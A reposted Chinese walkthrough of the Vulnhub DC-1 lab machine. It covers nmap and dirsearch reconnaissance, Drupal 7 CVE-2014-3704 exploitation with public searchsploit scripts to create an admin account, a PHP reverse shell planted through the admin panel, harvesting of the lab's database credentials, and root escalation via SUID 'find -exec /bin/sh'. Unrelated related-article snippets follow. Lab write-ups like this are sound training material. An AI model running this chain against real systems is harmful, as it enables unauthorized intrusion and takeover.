【Vulnhub系列】Vulnhub_DC-1靶场渗透(原创)

【Vulnhub系列靶场】Vulnhub_DC-1靶场渗透

原文转载已经过授权
原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)

一、环境准备

1、在百度网盘中下载DC-1靶场。DC-1靶场受virtual box 的影响,在VM中直接打开是扫描不到IP 的,我们需要先解决这个问题:【其他经验】Vulnhub靶机扫描不到IP解决办法

2、之后在VM中打开.ovf 文件,设置存储路径和任意名称

3、开机之后修改网络连接模式为【NAT】即可

二、信息收集

1、主机发现

nmap.exe -sn 192.168.31.*

image-20240215190004853

2、端口扫描

1、粗略快速探测

nmap.exe -F 192.168.31.64

image-20240215190129699

2、精细化扫描

nmap.exe -sT --min-rate 10000 -p- 192.168.31.64
nmap.exe -sU --min-rate 10000 -p- 192.168.31.64

image-20240215193134231

image-20240215193153578

3、全扫描和漏洞探测

nmap.exe -sT -sV -sC -O -p22,80,111,45384,46146 192.168.31.64
nmap.exe --script=vuln -p22,80,111,45384,46146 192.168.31.64

image-20240215193925495

Debian 操作系统

image-20240215194229531

80端口发现:cve2014-3704漏洞、csrf 和一些敏感路径

3、web目录探测

dirsearch.cmd -u http://192.168.31.64 -x 404,403

image-20240215195553109

4、web框架探测

whatweb http://192.168.31.64	#在kali中使用

image-20240215200000848

使用了Drupal 7的框架

三、获取shell立足点

1、cve2014-3704 SQL注入

访问网站,确实是一个Drupal 7 框架的网站

image-20240215200945203

根据nmap 探测出来的cve2014-3704 ,在漏洞库中进行查询

漏洞影响:Drupal 7.0~7.31

image-20240215201224514

我们直接将这个数据包进行保存,修改Host 为靶机地址,抓包重放

image-20240215204441344

利用成功,存在SQL注入

2、登录后台

我们利用这个SQL漏洞进行手工注入太过于麻烦,我们去searchsploit 上搜索有关Drupal 7 的相关漏洞

searchsploit.cmd Drupal 7

image-20240215212739190

有四个符合版本信息,挨个尝试

cp exploits/php/webapps/34992.py /c/Users/Administrator/Desktop/test/

1、第一个是直接添加一个管理员用户的py脚本:34992.py

python2 34992.py -t http://192.168.31.64 -u admin123 -p admin123	
#添加一个账号密码均为admin123的管理员

image-20240215212853269

image-20240215213029437

admin123:admin123登录后台

image-20240215213315976

IP被加入黑名单了,我说怎么登录不了,我们稍等片刻。之后换了admin1234:admin1234,提示账号未激活不能使用。

image-20240216184714618

2、我们尝试第四个php脚本:34993.php

修改我们的靶机地址

image-20240216194806747

之后执行

image-20240216194833054

之后用admin:admin进行登录

image-20240216195221938

成功登录后台

3、获取shell立足点

在后台模块中开启PHP代码

image-20240216201525764

进行保存,提示成功

image-20240216201653827

我们随便找一篇文章进行修改

image-20240216201907601

选择PHP代码

image-20240216201934513

添加上PHP反弹shell代码

image-20240216202351688

用nc 成功接收到shell

image-20240216202503815

四、提权至root

1、敏感信息收集

1、www下的sites/default/settings.php 数据库配置文件

drupaldb数据库的账号密码:dbuser:R0ck3t

image-20240216203650477

2、/etc/passwd 文件

存在flag4 这个用户

image-20240216204206491

3、flag4.txt 文件

image-20240216204341256

2、find高权限提权

find / -user root -perm -4000 -print 2>/dev/null

查找高权限命令

image-20240216205000230

3、提权至root

采用find 进行提权,成功拿到root权限

find / -exec "/bin/sh" \;

image-20240216205312662

原文转载已经过授权
更多文章请访问原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/51444.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

C++第五次作业

题目: 自实现myFind()函数, 在某个字符串str中查找子字符串str_key的位置,,如果找到,返回子字符串所出现的第一个位置的下标,如果没找到,返回-1。 例如 abcdefgabcdefg (str) def (str_key) 3 q…

西方2000年文明史

西方2000年文明史 PoliticsEconomyCultureScienceMathematicsPhysicsChemistryBiologyMedicineEngineeringArtMusicComputer Science / Information Technology The contributions of Western civilization over the past 2000 years span a wide range of fields, from politi…

flutter自定义icon

从iconfont-阿里巴巴矢量图标库下载自己的选好的图标库 复制ttf文件到 fonts目录下,如:D:\dev\Android\apps\ichat\fonts\my_iconfont.ttf 在pubspec.yaml里面配置 flutter: fonts:- family: my_iconfonts:- asset: fonts/my_icon_font.t…

Python入门知识点 9--函数作用域与名称空间

一、练习答案 项目名称: 上一篇练习 项目描述: 练习答案 项目环境: python3.8.10 作者所属: 小赵 # 1.定义一个函数,内容为输出一句(人生苦短,我选python),并调用该函数 def talk():print(人生苦短,我选python) talk()# 2.定义一个函数,该函数在调用的时候会接收2个数值数据&am…

【Vulnhub系列】Vulnhub_SecureCode1靶场渗透(原创)

【Vulnhub系列靶场】Vulnhub_SecureCode1靶场渗透 原文转载已经过授权 原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io) 一、环境配置 1、从百度网盘下载对应靶机的.ova镜像 2、在VM中选择【打开】该.ova 3、选择存储路径&#xff0…

Mathtype7.8中文版远程安装并嵌入word(包成功)

Mathtype7.8是一款专业的数学公式编辑工具,能够帮助用户在各种文档中插入复杂的数学公式和符号。数学公式编辑器工具可以轻松输入各种复杂的公式和符号,与Office文档完美结合,显示效果超好,比Office自带的公式编辑器要强大很多。M…

obsidian 首页制作 辅助笔记总结回顾

记笔记最重要的是回顾与总结,有这么一款插件可以让我们自己搭建一个美观的首页,它包括热力图、文稿统计、文稿回顾等等功能,你是否愿意尝试呢? 今天就介绍一款插件,能快速制作笔记首页,辅助总结、回顾。 …

深入浅出搞懂 Apache CXF 框架

Web服务是系统与系统之间通信的重要方式。本文将结合Apache CXF和Spring,详细讲解如何创建和配置Web服务,并给出具体的示例,帮助读者快速上手。 什么是Web服务? Web服务是一种允许不同应用程序通过网络进行互操作的技术&#xff…

sql注入详解【从数据库架构分析】

简介 SQL注入是一种常见的Web应用程序安全漏洞,它允许攻击者在Web应用程序中插入恶意SQL语句,从而操纵数据库执行非授权的操作。这种攻击利用了应用程序在处理用户输入时的不足,特别是当应用程序直接将用户输入作为SQL语句的一部分使用&…

Flutter Screenshot使用指南:轻松捕获Widget为图片

Flutter Screenshot使用指南:轻松捕获Widget为图片 简介 screenshot 是一个Flutter插件,它提供了一个简单的方法来捕获任何Widget为图片,包括那些未渲染在屏幕上的Widget。 主要功能 捕获屏幕上的Widget为图片。支持捕获不可见的Widget&a…

聊聊基于Alink库的特征工程方法

独热编码 OneHotEncoder 是用于将类别型特征转换为独热编码的类。独热编码是一种常用的特征编码方式,特别适用于处理类别型特征,将其转换为数值型特征。 对于每个类别型特征,OneHotEncoder 将其编码成一个长度为类别数量的向量。 每个类别对…

数据库实验:SQL Server基本表单表查询

一、实验目的: 1、掌握使用SQL语法实现单表查询 二、实验内容: 1. 查询订购日期为2001年5月22日的订单情况。(Orders)(时间日期的表达方式为 dOrderDate ‘2001-5-22’,类似字符串,使用单引号…

Python爬虫技术 第20节 模拟用户交互

Python爬虫技术是一种自动化获取网页数据的方法。模拟用户交互是其中的一个高级主题,通常用于处理那些需要用户输入、点击按钮或者执行其他交互操作才能加载数据的动态网站。 下面我会分步骤介绍如何使用Python来模拟这些用户交互: 1. 基础爬虫知识 在…

vue的虚拟Dom和diff算法

什么是虚拟dom: 虚拟 DOM 是一个抽象的虚拟树结构,用于表示页面的结构和内容,但它并不直接与实际的浏览器 DOM 交互。当响应式数据变化时,Vue 会生成一个新的虚拟 DOM 树,表示更新后的页面状态,再通过diff…

NumpyPandas:Pandas库(50%-100%)

目录 前言 一、排序 1.使用索引排序 2.使用变量值排序 二、计算新变量 1.新变量为常量 2.根据原变量新增列 3.基于一个原变量做函数运算 4.在指定位置插入新列 三、修改替换变量值 1.对应数值替换 2.指定范围替换 四、虚拟变量变换 五、数值变量分组 六、数据分组…

ChatGPT:@JSONField 有什么用

ChatGPT:JSONField 有什么用 JSONField 注解在使用 Fastjson 进行 JSON 序列化和反序列化时,提供了以下主要功能: 字段别名: 你可以使用 JSONField 注解指定 JSON 字符串中字段的名称。如果 Java 对象的字段名与 JSON 字符串中的…

构建大规模账号池与本地部署:GitHub爬虫项目详解

账号池搭建 必要性 常见登录方式: 基于Session Cookie的登录基于JWT的登录:登录生成JWT字符串 账号池存储cookie或者JWT字符串 方便后续发请求爬取数据 本地部署 conda建立一个虚拟环境 conda create -n new_env python3.x # 替换 x 为你需要的 P…

Python3网络爬虫开发实战(7)JavaScript 动态渲染页面爬取

文章目录 一、Selenium1. 基本安装2. 基本使用3. 声明浏览器对象4. 访问页面5. 查找节点6. 节点交互7. 动作链8. 执行 JavaScript9. 获取节点信息10. 切换 Frame11. 延时等待12. 前进后退13. Cookies14. 选项卡管理15. 异常处理16. 反屏蔽17. 无头模式18. Pyppeteer&#xff0c…

80后最后的书信 年代

当时11亿人口只有1.8万部固定电话 中国几千年来 鱼传尺素 雁寄鸿书 写信最后要写 亲啓 如有照片,封面要写内有照片,请勿折叠 信的开头应该是 见字如面,展信舒颜 如果拜托别人做事情,最后要写为盼 最后要写 某某草 书未尽…